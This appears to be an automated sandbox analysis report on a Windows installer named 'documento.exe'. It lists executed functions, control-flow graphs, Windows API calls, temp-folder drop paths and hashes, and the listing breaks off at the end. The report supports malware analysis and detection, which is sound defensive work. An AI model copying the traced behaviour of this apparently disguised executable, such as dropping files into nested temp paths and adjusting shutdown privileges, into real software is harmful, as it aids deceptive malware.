GetLastError 3434->3436 3435->3403 3436->3435 3438 4060b8 GetProcAddress 3437->3438 3439 4060ae 3437->3439 3441 40547d 3438->3441 3443 406028 GetSystemDirectoryA 3439->3443 3441->3403 3442 4060b4 3442->3438 3442->3441 3444 40604a wsprintfA LoadLibraryA 3443->3444 3444->3442 4446 4016b3 4447 402a3a 18 API calls 4446->4447 4448 4016b9 GetFullPathNameA 4447->4448 4449 4016f1 4448->4449 4450 4016d0 4448->4450 4451 401705 GetShortPathNameA 4449->4451 4452 4028cf 4449->4452 4450->4449 4453 406001 2 API calls 4450->4453 4451->4452 4454 4016e1 4453->4454 4454->4449 4456 405cfd lstrcpynA 4454->4456 4456->4449 4464 4014b7 4465 4014bd 4464->4465 4466 401389 2 API calls 4465->4466 4467 4014c5 4466->4467 4468 401d38 GetDC GetDeviceCaps 4469 402a1d 18 API calls 4468->4469 4470 401d56 MulDiv ReleaseDC 4469->4470 4471 402a1d 18 API calls 4470->4471 4472 401d75 4471->4472 4473 405d1f 18 API calls 4472->4473 4474 401dae CreateFontIndirectA 4473->4474 4475 402513 4474->4475 4476 40363b 4477 403646 4476->4477 4478 40364a 4477->4478 4479 40364d GlobalAlloc 4477->4479 4479->4478 4480 40173e 4481 402a3a 18 API calls 4480->4481 4482 401745 4481->4482 4483 40599f 2 API calls 4482->4483 4484 40174c 4483->4484 4484->4484 4485 401ebe 4486 402a3a 18 API calls 4485->4486 4487 401ec5 4486->4487 4488 406001 2 API calls 4487->4488 4489 401ecb 4488->4489 4491 401edd 4489->4491 4492 405c5b wsprintfA 4489->4492 4492->4491 4493 40193f 4494 402a3a 18 API calls 4493->4494 4495 401946 lstrlenA 4494->4495 4496 402513 4495->4496

                                                Executed Functions

                                                Function 004030D9 Relevance: 94.9, APIs: 32, Strings: 22, Instructions: 355comstringfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4030d9-40310e SetErrorMode GetVersion 1 403110-403118 call 406092 0->1 2 403121-4031b2 call 406028 * 3 call 406092 * 2 #17 OleInitialize SHGetFileInfoA call 405cfd GetCommandLineA call 405cfd GetModuleHandleA 0->2 1->2 8 40311a 1->8 20 4031b4-4031b9 2->20 21 4031be-4031d3 call 40579a CharNextA 2->21 8->2 20->21 24 403298-40329c 21->24 25 4032a2 24->25 26 4031d8-4031db 24->26 29 4032b5-4032cf GetTempPathA call 4030a8 25->29 27 4031e3-4031eb 26->27 28 4031dd-4031e1 26->28 30 4031f3-4031f6 27->30 31 4031ed-4031ee 27->31 28->27 28->28 39 4032d1-4032ef GetWindowsDirectoryA lstrcatA call 4030a8 29->39 40 403327-403341 DeleteFileA call 402c66 29->40 33 403288-403295 call 40579a 30->33 34 4031fc-403200 30->34 31->30 33->24 48 403297 33->48 37 403202-403208 34->37 38 403218-403245 34->38 43 40320a-40320c 37->43 44 40320e 37->44 45 403247-40324d 38->45 46 403258-403286 38->46 39->40 57 4032f1-403321 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030a8 39->57 54 4033d5-4033e5 call 4035a3 OleUninitialize 40->54 55 403347-40334d 40->55 43->38 43->44 44->38 50 403253 45->50 51 40324f-403251 45->51 46->33 53 4032a4-4032b0 call 405cfd 46->53 48->24 50->46 51->46 51->50 53->29 68 403509-40350f 54->68 69 4033eb-4033fb call 4054f3 ExitProcess 54->69 58 4033c5-4033cc call 40367d 55->58 59 40334f-40335a call 40579a 55->59 57->40 57->54 66 4033d1 58->66 70 403390-40339a 59->70 71 40335c-403385 59->71 66->54 73 403511-40352a GetCurrentProcess OpenProcessToken 68->73 74 40358b-403593 68->74 78 403401-403415 call 405476 lstrcatA 70->78 79 40339c-4033a9 call 40585d 70->79 75 403387-403389 71->75 81 40355c-40356a call 406092 73->81 82 40352c-403556 LookupPrivilegeValueA AdjustTokenPrivileges 73->82 76 403595 74->76 77 403599-40359d ExitProcess 74->77 75->70 84 40338b-40338e 75->84 76->77 93 403422-40343c lstrcatA lstrcmpiA 78->93 94 403417-40341d lstrcatA 78->94 79->54 92 4033ab-4033c1 call 405cfd * 2 79->92 90 403578-403582 ExitWindowsEx 81->90 91 40356c-403576 81->91 82->81 84->70 84->75 90->74 96 403584-403586 call 40140b 90->96 91->90 91->96 92->58 93->54 95 40343e-403441 93->95 94->93 99 403443-403448 call 4053dc 95->99 100 40344a call 405459 95->100 96->74 108 40344f-40345c SetCurrentDirectoryA 99->108 100->108 109 403469-403491 call 405cfd 108->109 110 40345e-403464 call 405cfd 108->110 114 403497-4034b3 call 405d1f DeleteFileA 109->114 110->109 117 4034f4-4034fb 114->117 118 4034b5-4034c5 CopyFileA 114->118 117->114 120 4034fd-403504 call 405bb8 117->120 118->117 119 4034c7-4034e7 call 405bb8 call 405d1f call 40548e 118->119 119->117 129 4034e9-4034f0 CloseHandle 119->129 120->54 129->117
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 004030FE
                                                • GetVersion.KERNEL32 ref: 00403104
                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
                                                • OleInitialize.OLE32(00000000), ref: 0040315A
                                                • SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
                                                • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\documento.exe",00000000), ref: 0040319E
                                                • CharNextA.USER32(00000000), ref: 004031C9
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004032C6
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D7
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E3
                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004032F7
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FF
                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403310
                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403318
                                                • DeleteFileA.KERNELBASE(1033), ref: 0040332C
                                                  • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                  • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060BF
                                                • OleUninitialize.OLE32 ref: 004033DA
                                                  • Part of subcall function 004054F3: MessageBoxIndirectA.USER32 ref: 0040554E
                                                • ExitProcess.KERNEL32 ref: 004033FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
                                                • String ID: "$"C:\Users\user\Desktop\documento.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Deinotherium$C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry$C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare$C:\Users\user\Desktop$C:\Users\user\Desktop\documento.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
                                                • API String ID: 2526692829-1890821402
                                                • Opcode ID: 65d8c7c0dc71d37f73623eda482e5ff5e021372f15626971e5a0e3397de26aea
                                                • Instruction ID: bda156f374487f2bbb29673c031f74f644c2b1eaea70be50b0a917a6d4bf9e43
                                                • Opcode Fuzzy Hash: 65d8c7c0dc71d37f73623eda482e5ff5e021372f15626971e5a0e3397de26aea
                                                • Instruction Fuzzy Hash: 17C1E6706082427AE7116F719D4DA2B3EACEB8570AF04457FF542B51E2CB7C9A058B2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405054 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 130 405054-405070 131 405076-40513d GetDlgItem * 3 call 403f17 call 4047b4 GetClientRect GetSystemMetrics SendMessageA * 2 130->131 132 4051ff-405205 130->132 150 40515b-40515e 131->150 151 40513f-405159 SendMessageA * 2 131->151 134 405207-405229 GetDlgItem CreateThread CloseHandle 132->134 135 40522f-40523b 132->135 134->135 137 40525d-405263 135->137 138 40523d-405243 135->138 142 405265-40526b 137->142 143 4052b8-4052bb 137->143 140 405245-405258 ShowWindow * 2 call 403f17 138->140 141 40527e-405285 call 403f49 138->141 140->137 154 40528a-40528e 141->154 147 405291-4052a1 ShowWindow 142->147 148 40526d-405279 call 403ebb 142->148 143->141 145 4052bd-4052c3 143->145 145->141 152 4052c5-4052d8 SendMessageA 145->152 155 4052b1-4052b3 call 403ebb 147->155 156 4052a3-4052ac call 404f16 147->156 148->141 159 405160-40516c SendMessageA 150->159 160 40516e-405185 call 403ee2 150->160 151->150 161 4053d5-4053d7 152->161 162 4052de-40530a CreatePopupMenu call 405d1f AppendMenuA 152->162 155->143 156->155 159->160 169 405187-40519b ShowWindow 160->169 170 4051bb-4051dc GetDlgItem SendMessageA 160->170 161->154 167 40530c-40531c GetWindowRect 162->167 168 40531f-405335 TrackPopupMenu 162->168 167->168 168->161 172 40533b-405355 168->172 173 4051aa 169->173 174 40519d-4051a8 ShowWindow 169->174 170->161 171 4051e2-4051fa SendMessageA * 2 170->171 171->161 175 40535a-405375 SendMessageA 172->175 176 4051b0-4051b6 call 403f17 173->176 174->176 175->175 177 405377-405397 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 175->177 176->170 179 405399-4053b9 SendMessageA 177->179 179->179 180 4053bb-4053cf GlobalUnlock SetClipboardData CloseClipboard 179->180 180->161
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 004050B3
                                                • GetDlgItem.USER32(?,000003EE), ref: 004050C2
                                                • GetClientRect.USER32 ref: 004050FF
                                                • GetSystemMetrics.USER32 ref: 00405106
                                                • SendMessageA.USER32 ref: 00405127
                                                • SendMessageA.USER32 ref: 00405138
                                                • SendMessageA.USER32 ref: 0040514B
                                                • SendMessageA.USER32 ref: 00405159
                                                • SendMessageA.USER32 ref: 0040516C
                                                • ShowWindow.USER32(00000000,?), ref: 0040518E
                                                • ShowWindow.USER32(?,00000008), ref: 004051A2
                                                • GetDlgItem.USER32(?,000003EC), ref: 004051C3
                                                • SendMessageA.USER32 ref: 004051D3
                                                • SendMessageA.USER32 ref: 004051EC
                                                • SendMessageA.USER32 ref: 004051F8
                                                • GetDlgItem.USER32(?,000003F8), ref: 004050D1
                                                  • Part of subcall function 00403F17: SendMessageA.USER32 ref: 00403F25
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405214
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
                                                • CloseHandle.KERNELBASE(00000000), ref: 00405229
                                                • ShowWindow.USER32(00000000), ref: 0040524C
                                                • ShowWindow.USER32(?,00000008), ref: 00405253
                                                • ShowWindow.USER32(00000008), ref: 00405299
                                                • SendMessageA.USER32 ref: 004052CD
                                                • CreatePopupMenu.USER32 ref: 004052DE
                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052F3
                                                • GetWindowRect.USER32(?,000000FF), ref: 00405313
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                • SendMessageA.USER32 ref: 00405368
                                                • OpenClipboard.USER32(00000000), ref: 00405378
                                                • EmptyClipboard.USER32 ref: 0040537E
                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                • GlobalLock.KERNEL32 ref: 00405391
                                                • SendMessageA.USER32 ref: 004053A5
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                • SetClipboardData.USER32 ref: 004053C9
                                                • CloseClipboard.USER32 ref: 004053CF
                                                Strings
                                                • Fortrstningsfuldere7 Setup: Completed, xrefs: 00405344
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: Fortrstningsfuldere7 Setup: Completed
                                                • API String ID: 590372296-854558490
                                                • Opcode ID: b2626d3fca1dea91d854c7e2fddc9d1fbf62c242f562a8688a47c95b42d676ee
                                                • Instruction ID: a6ff68720be7f0e5d6bf60450920f0594ccff0b83ae89a6b9846e031650dbd60
                                                • Opcode Fuzzy Hash: b2626d3fca1dea91d854c7e2fddc9d1fbf62c242f562a8688a47c95b42d676ee
                                                • Instruction Fuzzy Hash: 31A16B71900209BFDB119FA0DD89AAE7B79FB08354F10407AFA01B62A0C7B55E419F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405D1F Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 405d1f-405d2a 426 405d2c-405d3b 425->426 427 405d3d-405d52 425->427 426->427 428 405f45-405f49 427->428 429 405d58-405d63 427->429 431 405d75-405d7f 428->431 432 405f4f-405f59 428->432 429->428 430 405d69-405d70 429->430 430->428 431->432 433 405d85-405d8c 431->433 434 405f64-405f65 432->434 435 405f5b-405f5f call 405cfd 432->435 436 405d92-405dc7 433->436 437 405f38 433->437 435->434 439 405ee2-405ee5 436->439 440 405dcd-405dd8 GetVersion 436->440 441 405f42-405f44 437->441 442 405f3a-405f40 437->442 445 405f15-405f18 439->445 446 405ee7-405eea 439->446 443 405df2 440->443 444 405dda-405dde 440->444 441->428 442->428 452 405df9-405e00 443->452 444->443 449 405de0-405de4 444->449 447 405f26-405f36 lstrlenA 445->447 448 405f1a-405f21 call 405d1f 445->448 450 405efa-405f06 call 405cfd 446->450 451 405eec-405ef8 call 405c5b 446->451 447->428 448->447 449->443 457 405de6-405dea 449->457 461 405f0b-405f11 450->461 451->461 453 405e02-405e04 452->453 454 405e05-405e07 452->454 453->454 459 405e40-405e43 454->459 460 405e09-405e24 call 405be4 454->460 457->443 462 405dec-405df0 457->462 466 405e53-405e56 459->466 467 405e45-405e51 GetSystemDirectoryA 459->467 468 405e29-405e2c 460->468 461->447 465 405f13 461->465 462->452 469 405eda-405ee0 call 405f68 465->469 471 405ec0-405ec2 466->471 472 405e58-405e66 GetWindowsDirectoryA 466->472 470 405ec4-405ec7 467->470 473 405e32-405e3b call 405d1f 468->473 474 405ec9-405ecd 468->474 469->447 470->469 470->474 471->470 475 405e68-405e72 471->475 472->471 473->470 474->469 478 405ecf-405ed5 lstrcatA 474->478 480 405e74-405e77 475->480 481 405e8c-405ea2 SHGetSpecialFolderLocation 475->481 478->469 480->481 485 405e79-405e80 480->485 482 405ea4-405ebb SHGetPathFromIDListA CoTaskMemFree 481->482 483 405ebd 481->483 482->470 482->483 483->471 486 405e88-405e8a 485->486 486->470 486->481
                                                APIs
                                                • GetVersion.KERNEL32(?,rghtten,00000000,00404F4E,rghtten,00000000), ref: 00405DD0
                                                • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E4B
                                                • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E5E
                                                • SHGetSpecialFolderLocation.SHELL32(?,0040E8D8), ref: 00405E9A
                                                • SHGetPathFromIDListA.SHELL32(0040E8D8,: Completed), ref: 00405EA8
                                                • CoTaskMemFree.OLE32(0040E8D8), ref: 00405EB3
                                                • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                • lstrlenA.KERNEL32(: Completed,?,rghtten,00000000,00404F4E,rghtten,00000000), ref: 00405F27
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$rghtten$.1
                                                • API String ID: 900638850-1738432572
                                                • Opcode ID: 76471c8d00273be914602d8a65b1299599c04e7f86aa9f6c9fc5dbb2c8e8775a
                                                • Instruction ID: 0882c4b3dedd804cc86cf07441b0505b0d3b9fa6fe4ef2b0f086a7f01eec187c
                                                • Opcode Fuzzy Hash: 76471c8d00273be914602d8a65b1299599c04e7f86aa9f6c9fc5dbb2c8e8775a
                                                • Instruction Fuzzy Hash: D261F171A04A02ABDF209F24CC8877B3BA4EB55315F14813BE941BA2D0D27D4A42DF9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 670 40205e-4020c3 call 402a3a * 5 call 4057dc 683 4020c5-4020c7 call 402a3a 670->683 684 4020cc-4020e5 CoCreateInstance 670->684 683->684 686 4021bb-4021c2 684->686 687 4020eb-402101 684->687 688 4021c4-4021c9 call 401423 686->688 692 402107-402118 687->692 693 4021ad-4021b9 687->693 694 4028cf-4028de 688->694 698 402128-40212a 692->698 699 40211a-402123 692->699 693->686 701 4021ce-4021d0 693->701 702 402136-402147 698->702 703 40212c-402131 698->703 699->698 701->688 701->694 705 402156-402171 702->705 706 402149-402152 702->706 703->702 709 402173-402191 MultiByteToWideChar 705->709 710 4021a4-4021a8 705->710 706->705 709->710 711 402193-40219d 709->711 710->693 712 4021a1 711->712 712->710
                                                APIs
                                                • CoCreateInstance.OLE32(004073C0,?,00000001,004073B0,?), ref: 004020DD
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare, xrefs: 0040211D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare
                                                • API String ID: 123533781-123516722
                                                • Opcode ID: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                • Instruction ID: 73ba7e37247343007321aa60fc7c63e2173afb66a68b14033088ab5266f46407
                                                • Opcode Fuzzy Hash: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                • Instruction Fuzzy Hash: 22513A75A00208BFDF10DFA4C988A9D7BB5FF48318F20416AF915EB2D1DB799941CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 713 406344-406349 714 4063ba-4063d8 713->714 715 40634b-40637a 713->715 716 4069b0-4069c5 714->716 717 406381-406385 715->717 718 40637c-40637f 715->718 721 4069c7-4069dd 716->721 722 4069df-4069f5 716->722 719 406387-40638b 717->719 720 40638d 717->720 723 406391-406394 718->723 719->723 720->723 726 4069f8-4069ff 721->726 722->726 724 4063b2-4063b5 723->724 725 406396-40639f 723->725 729 406587-4065a5 724->729 727 4063a1 725->727 728 4063a4-4063b0 725->728 730 406a01-406a05 726->730 731 406a26-406a32 726->731 727->728 734 40641a-406448 728->734 732 4065a7-4065bb 729->732 733 4065bd-4065cf 729->733 735 406bb4-406bbe 730->735 736 406a0b-406a23 730->736 740 4061c8-4061d1 731->740 738 4065d2-4065dc 732->738 733->738 741 406464-40647e 734->741 742 40644a-406462 734->742 739 406bca-406bdd 735->739 736->731 744 4065de 738->744 745 40657f-406585 738->745 743 406be2-406be6 739->743 746 4061d7 740->746 747 406bdf 740->747 748 406481-40648b 741->748 742->748 767 406564-40657c 744->767 768 406b66-406b70 744->768 745->729 756 406523-40652d 745->756 752 406283-406287 746->752 753 4062f3-4062f7 746->753 754 4061de-4061e2 746->754 755 40631e-40633f 746->755 747->743 749 406491 748->749 750 406402-406408 748->750 773 4063e7-4063ff 749->773 774 406b4e-406b58 749->774 763 4064bb-4064c1 750->763 764 40640e-406414 750->764 758 406b33-406b3d 752->758 759 40628d-4062a6 752->759 761 406b42-406b4c 753->761 762 4062fd-406311 753->762 754->739 760 4061e8-4061f5 754->760 755->716 765 406b72-406b7c 756->765 766 406533-4066fc 756->766 758->739 769 4062a9-4062ad 759->769 760->747 772 4061fb-406241 760->772 761->739 775 406314-40631c 762->775 770 4064c3-4064e1 763->770 771 40651f 763->771 764->734 764->771 765->739 766->740 767->745 768->739 769->752 777 4062af-4062b5 769->777 778 4064e3-4064f7 770->778 779 4064f9-40650b 770->779 771->756 780 406243-406247 772->780 781 406269-40626b 772->781 773->750 774->739 775->753 775->755 782 4062b7-4062be 777->782 783 4062df-4062f1 777->783 784 40650e-406518 778->784 779->784 785 406252-406260 GlobalAlloc 780->785 786 406249-40624c GlobalFree 780->786 787 406279-406281 781->787 788 40626d-406277 781->788 789 4062c0-4062c3 GlobalFree 782->789 790 4062c9-4062d9 GlobalAlloc 782->790 783->775 784->763 791 40651a 784->791 785->747 792 406266 785->792 786->785 787->769 788->787 788->788 789->790 790->747 790->783 794 4064a0-4064b8 791->794 795 406b5a-406b64 791->795 792->781 794->763 795->739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                • Instruction ID: 747aed367833ce7965c7456030a986fa8c308b51e1337f5c25afca0a07e996cc
                                                • Opcode Fuzzy Hash: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                • Instruction Fuzzy Hash: 35F17670D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406001 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,00421570,00421128,004058A0,00421128,00421128,00000000,00421128,00421128,T'qu,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 0040600C
                                                • FindClose.KERNEL32(00000000), ref: 00406018
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
